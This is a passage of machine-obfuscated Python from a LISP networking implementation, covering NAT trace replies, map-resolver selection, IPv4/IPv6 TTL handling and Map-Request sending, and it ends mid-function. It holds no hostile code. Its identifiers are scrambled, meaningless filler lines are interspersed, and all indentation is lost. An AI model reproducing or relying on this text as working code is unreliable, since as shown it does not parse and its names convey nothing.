if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 1 - 1: OoooooooOO / i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: OOooOOo * O0 * II111iiii % OoOoOO00
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
I1IIiIIIii , Oo0O00O = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( I1IIiIIIii == None ) :
I1IIiIIIii , Oo0O00O = rts_rloc . split ( ":" )
Oo0O00O = int ( Oo0O00O )
lprint ( "Send LISP-Trace to address {}:{}" . format ( I1IIiIIIii , Oo0O00O ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( I1IIiIIIii ,
Oo0O00O ) )
if 12 - 12: Oo0Ooo . o0oOOo0O0Ooo - i1IIi - oO0o % IiII . I11i
if 17 - 17: i1IIi % OoO0O00 + i11iIiiIii % I1Ii111 * ooOoO0o . I1ii11iIi11i
if ( lisp_socket == None ) :
IiII1iiI = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
IiII1iiI . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
IiII1iiI . sendto ( packet , ( I1IIiIIIii , Oo0O00O ) )
IiII1iiI . close ( )
else :
lisp_socket . sendto ( packet , ( I1IIiIIIii , Oo0O00O ) )
if 64 - 64: O0 - iII111i
if 82 - 82: O0
if 37 - 37: I1Ii111
def packet_length ( self ) :
o0oOo00 = 8 ; O0oOo0O0O = 4 + 4 + 8
return ( o0oOo00 + O0oOo0O0O + len ( json . dumps ( self . packet_json ) ) )
if 68 - 68: OoO0O00 * OOooOOo * ooOoO0o / ooOoO0o . O0 + I11i
if 79 - 79: iIii1I11I1II1 / I1IiiI / OoooooooOO % IiII . OoOoOO00
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
Oo000O000 = self . local_rloc + ":" + self . local_port
i11II = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ Oo000O000 ] = i11II
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( Oo000O000 , i11II ) )
if 70 - 70: OoOoOO00 + OoooooooOO + iIii1I11I1II1 / Ii1I
if 92 - 92: II111iiii - IiII / II111iiii
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
Oo000O000 = local_rloc_and_port
try : i11II = lisp_rtr_nat_trace_cache [ Oo000O000 ]
except : i11II = ( None , None )
return ( i11II )
if 23 - 23: Ii1I * II111iiii - I1ii11iIi11i
if 86 - 86: ooOoO0o . OoO0O00 + I1Ii111 - I11i % i11iIiiIii / OoOoOO00
if 47 - 47: IiII
if 32 - 32: i1IIi / iIii1I11I1II1 / iII111i
if 11 - 11: I1ii11iIi11i - iIii1I11I1II1
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO
if 68 - 68: ooOoO0o / I1Ii111 * OoO0O00 + ooOoO0o / iIii1I11I1II1 . iII111i
if 91 - 91: OoO0O00
if 8 - 8: oO0o
if 96 - 96: IiII
if 37 - 37: Ii1I % i11iIiiIii + iIii1I11I1II1 % Oo0Ooo - iIii1I11I1II1
def lisp_get_map_server ( address ) :
for ii1iOo in lisp_map_servers_list . values ( ) :
if ( ii1iOo . map_server . is_exact_match ( address ) ) : return ( ii1iOo )
if 26 - 26: o0oOOo0O0Ooo . i1IIi
return ( None )
if 62 - 62: IiII * I1ii11iIi11i % iIii1I11I1II1 / II111iiii - OoO0O00
if 52 - 52: iII111i . I11i - I11i + oO0o + iIii1I11I1II1
if 83 - 83: I11i * iIii1I11I1II1 + OoOoOO00
if 81 - 81: ooOoO0o * OOooOOo / OoO0O00 + I1ii11iIi11i % I1Ii111
if 37 - 37: i11iIiiIii - OoooooooOO - OoOoOO00 * oO0o / Ii1I
if 100 - 100: II111iiii / Oo0Ooo / iII111i / OOooOOo
if 100 - 100: iIii1I11I1II1
def lisp_get_any_map_server ( ) :
for ii1iOo in lisp_map_servers_list . values ( ) : return ( ii1iOo )
return ( None )
if 50 - 50: I1Ii111 / ooOoO0o * I11i
if 53 - 53: II111iiii . IiII
if 5 - 5: i1IIi % IiII
if 16 - 16: ooOoO0o - iII111i % Ii1I . OoOoOO00
if 56 - 56: i11iIiiIii % i11iIiiIii % OoooooooOO . Ii1I . iII111i + I11i
if 64 - 64: O0
if 37 - 37: o0oOOo0O0Ooo / O0
if 58 - 58: I1Ii111 + OoooooooOO + iIii1I11I1II1
if 13 - 13: o0oOOo0O0Ooo . I11i / O0
if 39 - 39: I11i + oO0o + ooOoO0o % ooOoO0o - I1IiiI % Oo0Ooo
def lisp_get_map_resolver ( address , eid ) :
if ( address != None ) :
IiiIIi1 = address . print_address ( )
I1I1iiii111II = None
for Oo000O000 in lisp_map_resolvers_list :
if ( Oo000O000 . find ( IiiIIi1 ) == - 1 ) : continue
I1I1iiii111II = lisp_map_resolvers_list [ Oo000O000 ]
if 9 - 9: IiII / iII111i * II111iiii + O0 % Oo0Ooo / i1IIi
return ( I1I1iiii111II )
if 45 - 45: OoOoOO00 % i11iIiiIii . I1IiiI - O0 * i1IIi - I1IiiI
if 48 - 48: IiII / iIii1I11I1II1
if 20 - 20: oO0o / OoooooooOO
if 95 - 95: Oo0Ooo . i11iIiiIii
if 50 - 50: iII111i . i11iIiiIii - i1IIi
if 24 - 24: i11iIiiIii % iII111i . oO0o
if 44 - 44: II111iiii - OoO0O00 + i11iIiiIii
if ( eid == "" ) :
IIi11i1iIi = ""
elif ( eid == None ) :
IIi11i1iIi = "all"
else :
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( eid , False )
IIi11i1iIi = "all" if ooOOo0ooo == None else ooOOo0ooo . use_mr_name
if 62 - 62: oO0o - I1ii11iIi11i
if 16 - 16: I1IiiI . OoO0O00 * Ii1I / oO0o
i1I1iIiii = None
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
if ( IIi11i1iIi == "" ) : return ( I1I1iiii111II )
if ( I1I1iiii111II . mr_name != IIi11i1iIi ) : continue
if ( i1I1iIiii == None or I1I1iiii111II . last_used < i1I1iIiii . last_used ) : i1I1iIiii = I1I1iiii111II
if 65 - 65: ooOoO0o + I1ii11iIi11i * I1Ii111 . i1IIi * i1IIi
return ( i1I1iIiii )
if 33 - 33: II111iiii - OoooooooOO / II111iiii % Oo0Ooo / o0oOOo0O0Ooo
if 41 - 41: I1Ii111 / IiII % OoO0O00 - iIii1I11I1II1
if 98 - 98: OoOoOO00 + i11iIiiIii - iII111i + II111iiii
if 10 - 10: ooOoO0o * i11iIiiIii . o0oOOo0O0Ooo % ooOoO0o
if 14 - 14: i11iIiiIii . o0oOOo0O0Ooo % OoooooooOO
if 15 - 15: I11i - OoOoOO00 . OoOoOO00 * iII111i - Ii1I . i11iIiiIii
if 68 - 68: iII111i
if 68 - 68: I1Ii111 - OoO0O00 % OoO0O00 % OOooOOo - OoO0O00
def lisp_get_decent_map_resolver ( eid ) :
ooo = lisp_get_decent_index ( eid )
iiIiII = str ( ooo ) + "." + lisp_decent_dns_suffix
if 7 - 7: Ii1I . o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
lprint ( "Use LISP-Decent map-resolver {} for EID {}" . format ( bold ( iiIiII , False ) , eid . print_prefix ( ) ) )
if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + OOooOOo
i1I1iIiii = None
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
if ( iiIiII != I1I1iiii111II . dns_name ) : continue
if ( i1I1iIiii == None or I1I1iiii111II . last_used < i1I1iIiii . last_used ) : i1I1iIiii = I1I1iiii111II
if 97 - 97: oO0o % OoOoOO00 * oO0o % II111iiii + iIii1I11I1II1
return ( i1I1iIiii )
if 11 - 11: ooOoO0o . o0oOOo0O0Ooo
if 94 - 94: ooOoO0o . oO0o * OoooooooOO % oO0o
if 77 - 77: ooOoO0o % I1IiiI
if 26 - 26: o0oOOo0O0Ooo
if 72 - 72: I1IiiI
if 90 - 90: ooOoO0o
if 67 - 67: iIii1I11I1II1 + i1IIi * I1IiiI * OoooooooOO
def lisp_ipv4_input ( packet ) :
if 23 - 23: IiII
if 32 - 32: OoOoOO00 - iII111i % oO0o / I1ii11iIi11i - o0oOOo0O0Ooo
if 52 - 52: Ii1I / OoooooooOO % i11iIiiIii + iII111i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / oO0o + iII111i * I1ii11iIi11i - o0oOOo0O0Ooo
if ( ord ( packet [ 9 ] ) == 2 ) : return ( [ True , packet ] )
if 70 - 70: O0 / I1ii11iIi11i + ooOoO0o . OoO0O00 - OoO0O00 / i11iIiiIii
if 1 - 1: iIii1I11I1II1 % I1ii11iIi11i
if 49 - 49: iII111i + o0oOOo0O0Ooo % I1ii11iIi11i . O0 % OoooooooOO . o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii - i1IIi * o0oOOo0O0Ooo / OoOoOO00 % Oo0Ooo
Oo0 = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( Oo0 == 0 ) :
dprint ( "Packet arrived with checksum of 0!" )
else :
packet = lisp_ip_checksum ( packet )
Oo0 = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( Oo0 != 0 ) :
dprint ( "IPv4 header checksum failed for inner header" )
packet = lisp_format_packet ( packet [ 0 : 20 ] )
dprint ( "Packet header: {}" . format ( packet ) )
return ( [ False , None ] )
if 65 - 65: OoooooooOO + iII111i - i11iIiiIii - IiII + oO0o
if 67 - 67: i1IIi * I1Ii111 * O0
if 16 - 16: OoO0O00 + iII111i + i1IIi + I1ii11iIi11i - I1IiiI
if 88 - 88: oO0o % iII111i + I1ii11iIi11i - II111iiii . I11i
if 18 - 18: I1ii11iIi11i - i1IIi - IiII * II111iiii % I1Ii111 . II111iiii
if 80 - 80: oO0o + OoO0O00 + o0oOOo0O0Ooo . OoOoOO00
if 75 - 75: i11iIiiIii
oOoooOOO0o0 = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ]
if ( oOoooOOO0o0 == 0 ) :
dprint ( "IPv4 packet arrived with ttl 0, packet discarded" )
return ( [ False , None ] )
elif ( oOoooOOO0o0 == 1 ) :
dprint ( "IPv4 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 58 - 58: iII111i
return ( [ False , None ] )
if 48 - 48: OoO0O00 * OOooOOo / iII111i
if 90 - 90: I1IiiI * i11iIiiIii . OOooOOo / o0oOOo0O0Ooo
oOoooOOO0o0 -= 1
packet = packet [ 0 : 8 ] + struct . pack ( "B" , oOoooOOO0o0 ) + packet [ 9 : : ]
packet = packet [ 0 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : : ]
packet = lisp_ip_checksum ( packet )
return ( [ False , packet ] )
if 82 - 82: Oo0Ooo
if 50 - 50: I1Ii111 * OOooOOo * OoOoOO00 / OoooooooOO % iII111i
if 80 - 80: I1Ii111
if 35 - 35: Ii1I . O0 % i11iIiiIii * oO0o - OoooooooOO
if 87 - 87: iII111i * ooOoO0o - OOooOOo . O0
if 20 - 20: OoOoOO00 - IiII
if 9 - 9: O0 . I11i % I1ii11iIi11i * oO0o - I1Ii111 - i1IIi
def lisp_ipv6_input ( packet ) :
oo0OoO = packet . inner_dest
packet = packet . packet
if 66 - 66: II111iiii / Oo0Ooo
if 93 - 93: iII111i + I11i * OoooooooOO . OoO0O00
if 40 - 40: ooOoO0o * I1Ii111 + iII111i
if 52 - 52: iII111i % I11i
if 95 - 95: IiII + Ii1I / OoO0O00 - iII111i / I1IiiI
oOoooOOO0o0 = struct . unpack ( "B" , packet [ 7 : 8 ] ) [ 0 ]
if ( oOoooOOO0o0 == 0 ) :
dprint ( "IPv6 packet arrived with hop-limit 0, packet discarded" )
return ( None )
elif ( oOoooOOO0o0 == 1 ) :
dprint ( "IPv6 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 27 - 27: Oo0Ooo + i1IIi + i11iIiiIii . OoO0O00 . OoO0O00
return ( None )
if 56 - 56: I1Ii111 / OoO0O00 + o0oOOo0O0Ooo . OoooooooOO * Oo0Ooo
if 14 - 14: OoO0O00
if 21 - 21: II111iiii + i11iIiiIii + I11i % I1IiiI
if 65 - 65: IiII + I1ii11iIi11i / iII111i / I1IiiI + Ii1I
if 88 - 88: IiII % iIii1I11I1II1
if ( oo0OoO . is_ipv6_link_local ( ) ) :
dprint ( "Do not encapsulate IPv6 link-local packets" )
return ( None )
if 3 - 3: ooOoO0o / I1Ii111 % iIii1I11I1II1 % I11i * oO0o / iIii1I11I1II1
if 75 - 75: i11iIiiIii . iII111i
oOoooOOO0o0 -= 1
packet = packet [ 0 : 7 ] + struct . pack ( "B" , oOoooOOO0o0 ) + packet [ 8 : : ]
return ( packet )
if 68 - 68: OOooOOo . I1ii11iIi11i % I1ii11iIi11i . i11iIiiIii
if 45 - 45: oO0o % I1ii11iIi11i * I1Ii111
if 21 - 21: O0 + i11iIiiIii
if 72 - 72: OoOoOO00 * OoooooooOO % O0 / I1ii11iIi11i % Ii1I - I11i
if 65 - 65: iIii1I11I1II1 + II111iiii * OoO0O00 * i11iIiiIii / IiII
if 15 - 15: OoOoOO00 % O0 - OOooOOo - oO0o . iII111i . OoO0O00
if 52 - 52: II111iiii * o0oOOo0O0Ooo
if 95 - 95: I1Ii111 - OoooooooOO
def lisp_mac_input ( packet ) :
return ( packet )
if 99 - 99: OoooooooOO % IiII . I11i + OoooooooOO
if 57 - 57: Ii1I / I1IiiI * i1IIi
if 21 - 21: I11i . O0 * OoooooooOO + ooOoO0o * oO0o % i11iIiiIii
if 30 - 30: ooOoO0o * I1Ii111 + OoO0O00
if 30 - 30: Ii1I / iII111i * Ii1I
if 11 - 11: OoOoOO00 - OoOoOO00 % oO0o
if 3 - 3: I1IiiI - OoooooooOO % iIii1I11I1II1 + I1Ii111 + OoOoOO00
if 71 - 71: i1IIi % O0 % ooOoO0o
if 24 - 24: O0
def lisp_rate_limit_map_request ( dest ) :
i1iiI11IiIi1 = lisp_get_timestamp ( )
if 88 - 88: OoooooooOO / Oo0Ooo / oO0o
if 99 - 99: I1Ii111 % OoOoOO00 % IiII - Ii1I
if 79 - 79: ooOoO0o + Oo0Ooo
if 80 - 80: OoOoOO00 % OoO0O00 . OoO0O00 * OoO0O00 * O0
oO000o0Oo00 = i1iiI11IiIi1 - lisp_no_map_request_rate_limit
if ( oO000o0Oo00 < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME ) :
i1i = int ( LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - oO000o0Oo00 )
dprint ( "No Rate-Limit Mode for another {} secs" . format ( i1i ) )
return ( False )
if 18 - 18: II111iiii . o0oOOo0O0Ooo + OoO0O00
if 69 - 69: OoO0O00 . ooOoO0o * ooOoO0o * iIii1I11I1II1
if 8 - 8: iII111i . oO0o . OOooOOo + iII111i . Ii1I
if 46 - 46: OoO0O00
if 21 - 21: iIii1I11I1II1 - iII111i
if ( lisp_last_map_request_sent == None ) : return ( False )
oO000o0Oo00 = i1iiI11IiIi1 - lisp_last_map_request_sent
ii1i1iiI1 = ( oO000o0Oo00 < LISP_MAP_REQUEST_RATE_LIMIT )
if 15 - 15: O0 + iII111i + i11iIiiIii
if ( ii1i1iiI1 ) :
dprint ( "Rate-limiting Map-Request for {}, sent {} secs ago" . format ( green ( dest . print_address ( ) , False ) , round ( oO000o0Oo00 , 3 ) ) )
if 31 - 31: iIii1I11I1II1 * iIii1I11I1II1 . I11i
if 52 - 52: i11iIiiIii / oO0o / IiII
return ( ii1i1iiI1 )
if 84 - 84: I11i . oO0o + ooOoO0o
if 75 - 75: I1Ii111
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
if 73 - 73: ooOoO0o + O0 - I11i . I1IiiI + OOooOOo
if 36 - 36: I11i % OoO0O00 * OoOoOO00 - I1Ii111
if 16 - 16: ooOoO0o % OOooOOo . OoO0O00 % II111iiii . iIii1I11I1II1
def lisp_send_map_request ( lisp_sockets , lisp_ephem_port , seid , deid , rloc ) :
global lisp_last_map_request_sent
if 21 - 21: oO0o + II111iiii / OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
if 70 - 70: I1IiiI . ooOoO0o / I11i / OoO0O00
if 40 - 40: oO0o % iIii1I11I1II1 * iIii1I11I1II1 / Oo0Ooo * OoO0O00
if 61 - 61: OOooOOo
if 80 - 80: I1ii11iIi11i
iI111IOoo = iIi11iiI11 = None
if ( rloc ) :
iI111IOoo = rloc . rloc
iIi11iiI11 = rloc . translated_port if lisp_i_am_rtr else LISP_DATA_PORT
if 93 - 93: I1Ii111 . o0oOOo0O0Ooo
if 96 - 96: ooOoO0o - o0oOOo0O0Ooo % O0 * Ii1I . OoOoOO00
if 80 - 80: I1IiiI
if 31 - 31: I1Ii111 + o0oOOo0O0Ooo . I1IiiI + I11i . oO0o
if 50 - 50: Ii1I . OOooOOo
oOOOoOo0oo0O , IiiiI1i111 , OoO0o0OOOO = lisp_myrlocs
if ( oOOOoOo0oo0O == None ) :
lprint ( "Suppress sending Map-Request, IPv4 RLOC not found" )
return
if 6 - 6: OoooooooOO % ooOoO0o % OoO0O00 * IiII
if ( IiiiI1i111 == None and iI111IOoo != None and iI111IOoo . is_ipv6 ( ) ) :
lprint ( "Suppress sending Map-Request, IPv6 RLOC not found" )
return
if 62 - 62: i1IIi . I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
o0OOo0 = lisp_map_request ( )
o0OOo0 . record_count = 1
o0OOo0 . nonce = lisp_get_control_nonce ( )
o0OOo0 . rloc_probe = ( iI111IOoo != None )
if 93 - 93: oO0o / ooOoO0o - I1Ii111
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
if 30 - 30: IiII
if 6 - 6: O0
if 92 - 92: I11i
if 76 - 76: I11i / iIii1I11I1II1 - i11iIiiIii / O0 / O0
if ( rloc ) : rloc . last_rloc_probe_nonce = o0OOo0 . nonce
if 19 - 19: Ii1I . I1IiiI - i1IIi * ooOoO0o . iIii1I11I1II1
oOOooo000OoO = deid . is_multicast_address ( )
if ( oOOooo000OoO ) :
o0OOo0 . target_eid = seid
o0OOo0 . target_group = deid
else :
o0OOo0 . target_eid = deid
if 87 - 87: ooOoO0o % I1ii11iIi11i . I1IiiI
if 42 - 42: iII111i % i11iIiiIii % o0oOOo0O0Ooo . O0 % iII111i
if 72 - 72: Oo0Ooo . Oo0Ooo . IiII . Oo0Ooo
if 80 - 80: I1Ii111 + IiII + O0 - I1Ii111 . iIii1I11I1II1
if 53 - 53: OoO0O00 / i11iIiiIii * I1Ii111
if 62 - 62: oO0o / Oo0Ooo / IiII + I11i * ooOoO0o
if 84 - 84: ooOoO0o + OoOoOO00 * I1ii11iIi11i % OoooooooOO . O0
if 27 - 27: OoO0O00 * OoooooooOO - II111iiii / o0oOOo0O0Ooo
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
if ( o0OOo0 . rloc_probe == False ) :
ooOOo0ooo = lisp_get_signature_eid ( )
if ( ooOOo0ooo ) :
o0OOo0 . signature_eid . copy_address ( ooOOo0ooo . eid )
o0OOo0 . privkey_filename = "./lisp-sig.pem"
if 83 - 83: OOooOOo . ooOoO0o / IiII
if 80 - 80: I1Ii111 . I11i - I11i + I1ii11iIi11i
if 42 - 42: I11i / IiII % O0 - Oo0Ooo
if 33 - 33: I1Ii111
if 1 - 1: IiII - iIii1I11I1II1 % OoooooooOO
if 1 - 1: o0oOOo0O0Ooo - i11iIiiIii + I11i
if ( seid == None or oOOooo000OoO ) :
o0OOo0 . source_eid . afi = LISP_AFI_NONE
else :
o0OOo0 . source_eid = seid
if 47 - 47: O0 + IiII + ooOoO0o + OOooOOo / OoOoOO00
if 31 - 31: oO0o * iII111i % OoOoOO00
if 80 - 80: ooOoO0o % I1ii11iIi11i % I11i . I1Ii111
if 3 - 3: ooOoO0o - Oo0Ooo
if 2 - 2: iII111i . iII111i
if 77 - 77: OOooOOo
if 74 - 74: O0
if 86 - 86: OoOoOO00
if 4 - 4: OoooooooOO * OoO0O00
if 93 - 93: OoO0O00 - I1Ii111 - OoO0O00
if 1 - 1: o0oOOo0O0Ooo . oO0o * i11iIiiIii * IiII - OoO0O00 - OoooooooOO
if 29 - 29: iIii1I11I1II1 + OoO0O00 * II111iiii * Ii1I * iII111i . O0
if ( iI111IOoo != None and lisp_nat_traversal and lisp_i_am_rtr == False ) :
if ( iI111IOoo . is_private_address ( ) == False ) :
oOOOoOo0oo0O = lisp_get_any_translated_rloc ( )
if 6 - 6: I1IiiI - OoOoOO00
if ( oOOOoOo0oo0O == None ) :
lprint ( "Suppress sending Map-Request, translated RLOC not found" )
return
if 63 - 63: OOooOOo - oO0o * I1IiiI
if 60 - 60: II111iiii - Oo0Ooo
if 43 - 43: I1IiiI - IiII - OOooOOo
if 19 - 19: I1Ii111 / I1Ii111 - i1IIi
if 99 - 99: O0
if 37 - 37: iIii1I11I1II1 / I1Ii111 + OoO0O00
if 85 - 85: ooOoO0o / I1IiiI
if 7 - 7: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i * I1IiiI + Ii1I
if ( iI111IOoo == None or iI111IOoo . is_ipv4 ( ) ) :
if ( lisp_nat_traversal and iI111IOoo == None ) :
ooOO0o0oO = lisp_get_any_translated_rloc ( )
if ( ooOO0o0oO != None ) : oOOOoOo0oo0O = ooOO0o0oO
if 12 - 12: I1Ii111 / I11i / Ii1I
o0OOo0 . itr_rlocs . append ( oOOOoOo0oo0O )
if 95 - 95: iIii1I11I1II1 . Ii1I % oO0o - I11i % IiII
if ( iI111IOoo == None or iI111IOoo . is_ipv6 ( ) ) :
if ( IiiiI1i111 == None or IiiiI1i111 . is_ipv6_link_local ( ) ) :
IiiiI1i111 = None
else :
o0OOo0 . itr_rloc_count = 1 if ( iI111IOoo == None ) else 0
o0OOo0 . itr_rlocs . append ( IiiiI1i111 )
if 42 - 42: OoOoOO00 + oO0o * i1IIi + i11iIiiIii
if 25 - 25: Ii1I - Ii1I - I1ii11iIi11i / i1IIi . OoOoOO00 % Oo0Ooo
if 76 - 76: I1Ii111 / OoOoOO00
if 61 - 61: Oo0Ooo . i1IIi
if 78 - 78: i11iIiiIii
if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if ( iI111IOoo != None and o0OOo0 . itr_rlocs != [ ] ) :
o00O00oOO00 = o0OOo0 . itr_rlocs [ 0 ]
else :
if ( deid . is_ipv4 ( ) ) :
o00O00oOO00 = oOOOoOo0oo0O
elif ( deid . is_ipv6 ( ) ) :
o00O00oOO00 = IiiiI1i111
else :
o00O00oOO00 = oOOOoOo0oo0O
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
if 37 - 37: IiII
if 65 - 65: ooOoO0o * Ii1I / I1IiiI . i1IIi % ooOoO0o . OoooooooOO
if 17 - 17: ooOoO0o / OoO0O00 / I1IiiI / OOooOOo % IiII
if 88 - 88: i1IIi - OoOoOO00
IiiiIi1iiii11 = o0OOo0 . encode ( iI111IOoo , iIi11iiI11 )
o0OOo0 . print_map_request ( )
if 66 - 66: OoooooooOO - OoooooooOO * I11i / II111iiii + oO0o / Ii1I
if 7 - 7: Ii1I / iIii1I11I1II1
if 36 - 36: iIii1I11I1II1 % i11iIiiIii
if 35 - 35: Oo0Ooo + I1IiiI - O0 - I1Ii111
if 64 - 64: i1IIi * OoOoOO00 / II111iiii * oO0o
if 35 - 35: i1IIi - Ii1I - Ii1I . O0 % iII111i * iII111i
if ( iI111IOoo != None ) :
if ( rloc . is_rloc_translated ( ) ) :
IIiiiiII = lisp_get_nat_info ( iI111IOoo , rloc . rloc_name )
if 15 - 15: OoooooooOO . Ii1I * I1Ii111 . ooOoO0o % OoO0O00 * Oo0Ooo
if 10 - 10: iII111i + i11iIiiIii . OOooOOo % iII111i - i1IIi
if 10 - 10: iIii1I11I1II1 * i11iIiiIii - O0
if 45 - 45: oO0o % OOooOOo - IiII + o0oOOo0O0Ooo + i11iIiiIii
if ( IIiiiiII == None ) :
O0OOOO0o0O = rloc . rloc . print_address_no_iid ( )
i11ii = "gleaned-{}" . format ( O0OOOO0o0O )
oo00ooOOOo0O = rloc . translated_port
IIiiiiII = lisp_nat_info ( O0OOOO0o0O , i11ii , oo00ooOOOo0O )
if 79 - 79: IiII % I1Ii111 . I1IiiI + O0 * oO0o * ooOoO0o
lisp_encapsulate_rloc_probe ( lisp_sockets , iI111IOoo , IIiiiiII ,
IiiiIi1iiii11 )
return
if 38 - 38: IiII
if 78 - 78: Oo0Ooo * I1ii11iIi11i % OOooOOo / Oo0Ooo + I1ii11iIi11i * IiII
oo0o00OO = iI111IOoo . print_address_no_iid ( )
oo0OoO = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , oo0OoO , LISP_CTRL_PORT , IiiiIi1iiii11 )
return
if 2 - 2: Oo0Ooo - OoOoOO00
if 22 - 22: OoO0O00 - oO0o - O0
if 49 - 49: iIii1I11I1II1 + I1Ii111 / i11iIiiIii
if 62 - 62: ooOoO0o . I1IiiI * i11iIiiIii
if 2 - 2: i11iIiiIii
if 86 - 86: I1Ii111 + o0oOOo0O0Ooo
iiiO0OOOOo = None if lisp_i_am_rtr else seid
if ( lisp_decent_pull_xtr_configured ( ) ) :
I1I1iiii111II = lisp_get_decent_map_resolver ( deid )
else :
I1I1iiii111II = lisp_get_map_resolver ( None , iiiO0OOOOo )
if 100 - 100: OoOoOO00 + OOooOOo
if ( I1I1iiii111II == None ) :
lprint ( "Cannot find Map-Resolver for source-EID {}" . format ( green ( seid . print_address ( ) , False ) ) )
if 44 - 44: IiII % iII111i * iII111i + iII111i * i11iIiiIii - OoO0O00
return
if 89 - 89: I1ii11iIi11i - OoO0O00 / i11iIiiIii + ooOoO0o / OoOoOO00
I1I1iiii111II . last_used = lisp_get_timestamp ( )
I1I1iiii111II . map_requests_sent += 1
if ( I1I1iiii111II . last_nonce == 0 ) : I1I1iiii111II . last_nonce = o0OOo0 . nonce
if 15 - 15: II111iiii - IiII
if 74 - 74: i1IIi * OoooooooOO . Oo0Ooo . I1IiiI / o0oOOo0O0Ooo . OoOoOO00
if 50 - 50: I1ii11iIi11i / iIii1I11I1II1 - Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o
if 92 - 92: OoooooooOO - I1ii11iIi11i . I11i / O0 % iII111i
if ( seid == None ) : seid = o00O00oOO00
lisp_send_ecm ( lisp_sockets , IiiiIi1iiii11 , seid , lisp_ephem_port , deid ,
I1I1iiii111II . map_resolver )
if 96 - 96: I1IiiI . oO0o % O0
if 19 - 19: iIii1I11I1II1 + I1Ii111 / OoooooooOO % OOooOOo - i1IIi + I11i
if 87 - 87: OoooooooOO
if 97 - 97: ooOoO0o * IiII / iIii1I11I1II1
lisp_last_map_request_sent = lisp_get_timestamp ( )
if 65 - 65: i1IIi - i11iIiiIii + oO0o % I1IiiI - OoO0O00 % ooOoO0o
if 23 - 23: o0oOOo0O0Ooo . o0oOOo0O0Ooo - iIii1I11I1II1 / o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + I1Ii111 . I1ii11iIi11i . OoOoOO00 % o0oOOo0O0Ooo * o0oOOo0O0Ooo
if 2 - 2: oO0o % iII111i + I1ii11iIi11i / II111iiii * I1ii11iIi11i
I1I1iiii111II . resolve_dns_name ( )
return
if 45 - 45: II111iiii . iII111i
if 55 - 55: ooOoO0o / iII111i / O0
if 98 - 98: O0 % iII111i + II111iiii
if 13 - 13: I1IiiI * oO0o - o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + oO0o . oO0o / o0oOOo0O0Ooo
if 77 - 77: i1IIi * o0oOOo0O0Ooo * IiII
if 24 - 24: i11iIiiIii / iIii1I11I1II1 / iII111i
if 31 - 31: OOooOOo . iIii1I11I1II1 - oO0o
def lisp_send_info_request ( lisp_sockets , dest , port , device_name ) :
if 36 - 36: O0
if 30 - 30: i11iIiiIii * Oo0Ooo . IiII
if 65 - 65: oO0o * IiII * OOooOOo / OoooooooOO % I11i / I1Ii111
if 21 - 21: i1IIi * iII111i + OoO0O00
I1iII = lisp_info ( )
I1iII . nonce = lisp_get_control_nonce ( )
if ( device_name ) : I1iII . hostname += "-" + device_name
if 81 - 81: OOooOOo - OoooooooOO * iII111i / OOooOOo
oo0o00OO = dest . print_address_no_iid ( )
if 98 - 98: I11i . OOooOOo - OoO0O00 % O0 * O0
if 91 - 91: I1IiiI % ooOoO0o * iII111i % OoOoOO00 . OoOoOO00 + OoOoOO00
if 95 - 95: o0oOOo0O0Ooo % i1IIi
if 14 - 14: iIii1I11I1II1 + iIii1I11I1II1
if 74 - 74: OoOoOO00 . iIii1I11I1II1 + Ii1I + ooOoO0o % OoOoOO00
if 37 - 37: i11iIiiIii + O0 + II111iiii
if 13 - 13: OOooOOo / O0
